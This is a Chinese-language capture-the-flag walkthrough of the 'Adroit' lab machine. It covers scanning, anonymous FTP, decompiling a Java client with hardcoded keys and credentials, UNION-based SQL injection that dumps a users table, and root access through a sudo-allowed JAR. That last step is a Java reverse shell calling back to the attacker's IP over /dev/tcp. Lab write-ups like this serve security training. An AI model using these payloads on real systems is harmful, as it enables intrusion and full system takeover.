Adroit
信息搜集
端口扫描
┌──(kali💀kali)-[~/temp/Adroit]
└─$ rustscan -a 192.168.0.117 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.0.117:21
Open 192.168.0.117:22
Open 192.168.0.117:3000
Open 192.168.0.117:3306
Open 192.168.0.117:33060
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.0.143
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Mar 19 2021 pub
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 d2:32:82:0f:82:48:cd:c2:33:a2:a2:72:09:c5:28:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBOmXw5ri8Hn3MykepbauI+ByuSo0ns3+gFXEeUDhdZzsVp70+JWtN/h+Ik5HS4rkRP9/GZA6or8aMjSCuZwa8bjFqerqGXZTuyUphLZDRyGaYU83VI7+JZvTvt7qIonmkNZx2ELjjhPDaQAWehundLM3Ogpp/uKI7aZ36dwmfqFHkH91GFNAbG5C9C8MO8O8HhrIf1DmY3AFlnc0BFQKQJRlyxb9X5Eg1owTClyCJmj5k9SJbPqq/xF6HCElM8IcloYqU1TEt1nZ9WEvWQh2GmtdPEyXZp5AKHJMNb+36QNbBmnVh8WLdbSvUa05O8V6grinC8v0gjRwuD3Fb8rpz
| 256 4e:8a:9a:49:b9:23:c2:cd:ac:89:4f:44:b2:0b:0b:db (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDeUBewhPNaMXTEBm4QG9Qjyz/bHqvb/OS+BOqE9dIdqNYlrcm2P37/gi50k3XSK+G4RpihGBgd4FEPvoh7Y1Z8=
| 256 32:88:82:fc:84:79:98:1d:b2:27:96:26:96:5a:68:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINd4wtdIW6N9Kdxb4D08djwEH+x9Og4QhQZa62W64XW+
3000/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL (unauthorized)
33060/tcp open mysqlx? syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=4/29%Time=662FC9DE%P=x86_64-pc-linux-gnu%
SF:r(NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTT
SF:POptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\
SF:x0b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSV
SF:ersionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTC
SF:P,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x
SF:0fInvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\
SF:0")%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\
SF:x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCoo
SF:kie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messag
SF:e\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNe
SF:g,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05
SF:HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDStri
SF:ng,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message
SF:\"\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOpti
SF:ons,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05
SF:\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY
SF:000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\
SF:0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"
SF:)%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message
SF:\"\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel漏洞发现
敏感端口
尝试进行匿名登录:
┌──(kali💀kali)-[~/temp/Adroit]
└─$ ftp 192.168.0.117
Connected to 192.168.0.117.
220 (vsFTPd 3.0.3)
Name (192.168.0.117:kali): ftp
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls -la
229 Entering Extended Passive Mode (|||46635|)
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jan 14 2021 .
drwxr-xr-x 3 ftp ftp 4096 Jan 14 2021 ..
drwxr-xr-x 2 ftp ftp 4096 Mar 19 2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||41754|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 19 2021 .
drwxr-xr-x 3 ftp ftp 4096 Jan 14 2021 ..
-rw-r--r-- 1 ftp ftp 5451 Jan 14 2021 adroitclient.jar
-rw-r--r-- 1 ftp ftp 229 Mar 19 2021 note.txt
-rw-r--r-- 1 ftp ftp 36430 Jan 14 2021 structure.PNG
226 Directory send OK.
ftp> mget *
mget adroitclient.jar [anpqy?]?
229 Entering Extended Passive Mode (|||43310|)
150 Opening BINARY mode data connection for adroitclient.jar (5451 bytes).
100% |***********************************************************************************************************| 5451 212.13 KiB/s 00:00 ETA
226 Transfer complete.
5451 bytes received in 00:00 (205.68 KiB/s)
mget note.txt [anpqy?]?
229 Entering Extended Passive Mode (|||45106|)
150 Opening BINARY mode data connection for note.txt (229 bytes).
100% |***********************************************************************************************************| 229 8.62 KiB/s 00:00 ETA
226 Transfer complete.
229 bytes received in 00:00 (8.44 KiB/s)
mget structure.PNG [anpqy?]?
229 Entering Extended Passive Mode (|||43001|)
150 Opening BINARY mode data connection for structure.PNG (36430 bytes).
100% |***********************************************************************************************************| 36430 1.66 MiB/s 00:00 ETA
226 Transfer complete.
36430 bytes received in 00:00 (1.64 MiB/s)
ftp> exit
221 Goodbye.看看有些啥:
┌──(kali💀kali)-[~/temp/Adroit]
└─$ ls
adroitclient.jar note.txt structure.PNG
┌──(kali💀kali)-[~/temp/Adroit]
└─$ file *
adroitclient.jar: Java archive data (JAR)
note.txt: ASCII text
structure.PNG: PNG image data, 831 x 344, 8-bit/color RGBA, non-interlaced
┌──(kali💀kali)-[~/temp/Adroit]
└─$ cat note.txt
Hi, i am a junior developer and i am pro with cyber security.
Also i am a writer and i created a java socket app to save my ideas.
PS :
if you break something the server will restart within a minute.
Also, one 0 is not 0 but O他说这个java程序保存了他的想法,而且有一个O写成了0,尝试反编译一下:这里用到的是jd-gui这一ctf工具:
package adroit;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.UnsupportedEncodingException;
import java.net.Socket;
import java.net.UnknownHostException;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Scanner;
import javax.crypto.BadPaddingException;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
public class AdroitClient {
private static final String secret = "Sup3rS3cur3Dr0it";
static ObjectOutputStream os;
static ObjectInputStream is;
static Socket socket;
public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException, NotBoundException, ClassNotFoundException {
Cryptor crypt = new Cryptor();
try {
socket = new Socket("adroit.local", 3000);
os = new ObjectOutputStream(socket.getOutputStream());
is = new ObjectInputStream(socket.getInputStream());
R request = new R();
Scanner scanner = new Scanner(System.in);
System.out.println("Enter the username : ");
String userName = crypt.encrypt("Sup3rS3cur3Dr0it", scanner.nextLine());
System.out.println("Enter the password : ");
String password = crypt.encrypt("Sup3rS3cur3Dr0it", scanner.nextLine());
if (userName.equals(crypt.encrypt("Sup3rS3cur3Dr0it", "zeus")) &&
password.equals(crypt.encrypt("Sup3rS3cur3Dr0it", "god.thunder.olympus"))) {
request.setUsername(userName);
request.setPassword(password);
System.out.println("Options [ post | get ] : ");
String option = scanner.next();
scanner.nextLine();
if (option.toLowerCase().equals("post")) {
request.setOption("post");
System.out.println("Enter your phrase identifier : ");
String id = crypt.encrypt("Sup3rS3cur3Dr0it", scanner.nextLine());
System.out.println("Enter your phrase : ");
String phrase = crypt.encrypt("Sup3rS3cur3Dr0it", scanner.nextLine());
Idea idea = new Idea();
idea.setId(id);
idea.setPhrase(phrase);
request.setIdea(idea);
os.writeObject(request);
R responseobj = (R)is.readObject();
String response = responseobj.getOption();
System.out.println(response);
} else if (option.toLowerCase().equals("get")) {
request.setOption("get");
System.out.println("Enter the phrase identifier : ");
String inp = scanner.nextLine();
String id = crypt.encrypt("Sup3rS3cur3Dr0it", inp);
Idea idea = new Idea();
idea.setId(id);
request.setIdea(idea);
os.writeObject(request);
R responseobj = (R)is.readObject();
String response = responseobj.getOption();
System.out.println(response);
} else {
System.out.println("Bad option, valid options = get, post");
}
} else {
System.out.print("Wrong username or password");
}
scanner.close();
} catch (RemoteException e) {
System.out.println(e.getMessage());
e.printStackTrace();
} catch (UnknownHostException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
}
package adroit;
import java.io.UnsupportedEncodingException;
import java.security.InvalidKeyException;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.SecretKeySpec;
public class Cryptor {
private String secret;
public String getSecret() {
return this.secret;
}
public void setSecret(String secret) {
this.secret = secret;
}
public String encrypt(String key, String text) throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
Key aesKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(1, aesKey);
byte[] encrypted = cipher.doFinal(text.getBytes());
return Base64.getEncoder().encodeToString(encrypted);
}
public String decrypt(String key, String text) throws NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException {
try {
Key aesKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(2, aesKey);
String decrypted = new String(cipher.doFinal(Base64.getDecoder().decode(text)));
return decrypted;
} catch (InvalidKeyException i) {
System.out.println("[x] Invalid key length {16 required}");
return null;
}
}
}看到了奇怪的字符串Sup3rS3cur3Dr0it、zeus、god.thunder.olympus、adroit.local
添加dns解析:
192.168.0.117 adroit.localsql注入
尝试执行jar包,按照反编译的内容进行回答:
参考 https://book.hacktricks.xyz/pentesting-web/sql-injection 进行注入:
┌──(kali💀kali)-[~/temp/Adroit]
└─$ java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :
1' or '1' = '1
┌──(kali💀kali)-[~/temp/Adroit]
└─$ java -jar adroitclient.jar
Enter the username :
zeus
Enter the password :
god.thunder.olympus
Options [ post | get ] :
get
Enter the phrase identifier :
1 or 1 = 1
haxor test继续尝试:
1 union select 1,database() --
# adroit
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema ='adroit' --
# ideas,users
1 union select 1,group_concat(column_name) from information_schema.columns where table_name ='users' --
# id,password,username,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,USER
1 union select 1,group_concat(username,0x3a,password) from users --
# writer:l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY=尝试使用反编译的程序,然后写一个main函数输出结果:
创建一个Cryptor.java
// Cryptor.java
import java.io.UnsupportedEncodingException;
import java.security.InvalidKeyException;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import java.util.Base64;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.SecretKeySpec;
public class Cryptor {
private String secret;
public String getSecret() {
return this.secret;
}
public void setSecret(String secret) {
this.secret = secret;
}
public String encrypt(String key, String text) throws NoSuchPaddingException, NoSuchAlgorithmException,
InvalidKeyException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
Key aesKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(1, aesKey);
byte[] encrypted = cipher.doFinal(text.getBytes());
return Base64.getEncoder().encodeToString(encrypted);
}
public String decrypt(String key, String text) throws NoSuchPaddingException, NoSuchAlgorithmException,
InvalidKeyException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
try {
Key aesKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(2, aesKey);
return new String(cipher.doFinal(Base64.getDecoder().decode(text)));
} catch (InvalidKeyException i) {
System.out.println("[x] Invalid key length {16 required}");
return null;
}
}
}以及一个main:
// main
import java.io.UnsupportedEncodingException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import javax.crypto.BadPaddingException;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
public class Main {
public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
Cryptor cryptor = new Cryptor();
String password = cryptor.decrypt("Sup3rS3cur3Dr0it", "l4A<REDACTED>Kr015+OEC3aOfdrWafSqwpY=");
System.out.println(password);
}
}但是报错了:
发现是因为前面的作者有一个O写为了0,这里修改一下即可!
┌─ l4A<REDACTED>Kr015+OEC3aOfdrWafSqwpY=
└─> l4A<REDACTED>KrO15+OEC3aOfdrWafSqwpY=// main
import java.io.UnsupportedEncodingException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import javax.crypto.BadPaddingException;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
public class Main {
public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
Cryptor cryptor = new Cryptor();
String password = cryptor.decrypt("Sup3rS3cur3Dr0it", "l4A+n+p+xSxDcYCl0mgxKrO15+OEC3aOfdrWafSqwpY=");
System.out.println(password);
}
}
writer:just.write.my.ideas尝试进行ssh连接!!!!
提权
信息搜集
writer@adroit:~$ ls
user.txt
writer@adroit:~$ cat user.txt
61de3a25161dcb2b88b5119457690c3c
writer@adroit:~$ ls -la
total 32
drwxr-xr-x 3 writer writer 4096 Jan 14 2021 .
drwxr-xr-x 3 root root 4096 Jan 12 2021 ..
-rw------- 1 writer writer 616 Jan 14 2021 .bash_history
-rw-r--r-- 1 writer writer 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 writer writer 3526 Jan 12 2021 .bashrc
drwx------ 3 writer writer 4096 Jan 14 2021 .gnupg
-rw-r--r-- 1 writer writer 807 Jan 12 2021 .profile
-rw------- 1 writer writer 33 Jan 14 2021 user.txt
writer@adroit:~$ cd .gnupg/
writer@adroit:~/.gnupg$ ls -la
total 12
drwx------ 3 writer writer 4096 Jan 14 2021 .
drwxr-xr-x 3 writer writer 4096 Jan 14 2021 ..
drwx------ 2 writer writer 4096 Jan 14 2021 private-keys-v1.d
writer@adroit:~/.gnupg$ cd private-keys-v1.d/
writer@adroit:~/.gnupg/private-keys-v1.d$ ls -la
total 8
drwx------ 2 writer writer 4096 Jan 14 2021 .
drwx------ 3 writer writer 4096 Jan 14 2021 ..
writer@adroit:~/.gnupg/private-keys-v1.d$ cd ../../
writer@adroit:~$ cat .bash_history
sudo -l
exit
clear
sudo -l
cd /tmp
ls
wget http://10.0.2.15:8001/testingmyapp.jar
ks
ls
/usr/bin/java -jar /tmp/testingmyapp.jar
ls
chmod +x testingmyapp.jar
clear
/usr/bin/java -jar /tmp/testingmyapp.jar
java -jar /tmp/testingmyapp.jar
clear
sudo -l
sudo -u root /usr/bin/java -jar /tmp/testingmyapp.jar
sudo -u root /usr/bin/java -jar testingmyapp.jar
sudo -u root /usr/bin/java -jar /tmp/testingmyapp.jar
ls
rm testingmyapp.jar
wget http://10.0.2.15:8001/testingmyapp.jar
clear
ls
sudo -u root /usr/bin/java -jar /tmp/testingmyapp.jar
ls
rm testingmyapp.jar
ls
cd
ls
ls -la
rm .bash_history
ls
clear
su root
exit
writer@adroit:~$ sudo -l
[sudo] password for writer:
Matching Defaults entries for writer on adroit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User writer may run the following commands on adroit:
(root) /usr/bin/java -jar /tmp/testingmyapp.jar
writer@adroit:~$ ls -l /tmp/testingmyapp.jar
ls: cannot access '/tmp/testingmyapp.jar': No such file or directory构造java反弹shell
尝试使用java反弹shell进行构造。https://www.revshells.com/
public class testingmyapp {
public static void main(String[] args) {
Process p;
try {
p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.0.143/1234 0>&1");
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
}尝试编译一下:阔以参考 https://www.cnblogs.com/mq0036/p/8566427.html 以及 墨师傅bolg!
writer@adroit:/tmp$ cat testingmyapp.java
public class testingmyapp {
public static void main(String[] args) {
Process p;
try {
p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.0.143/1234 0>&1");
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
}
writer@adroit:/tmp$ vi manifest.txt
writer@adroit:/tmp$ cat manifest.txt
Main-Class: testingmyapp
writer@adroit:/tmp$ javac testingmyapp.java
writer@adroit:/tmp$ jar cfm testingmyapp.jar manifest.txt testingmyapp.class
writer@adroit:/tmp$ sudo -l
Matching Defaults entries for writer on adroit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User writer may run the following commands on adroit:
(root) /usr/bin/java -jar /tmp/testingmyapp.jar
writer@adroit:/tmp$ sudo /usr/bin/java -jar /tmp/testingmyapp.jar
然后拿下shell!!!!
参考
https://tryhackmyoffsecbox.github.io/Target-Machines-WriteUp/docs/HackMyVM/Machines/Adroit/
https://nepcodex.com/2021/07/adroit-1-0-1-walkthrough-vulnhub-writeup/
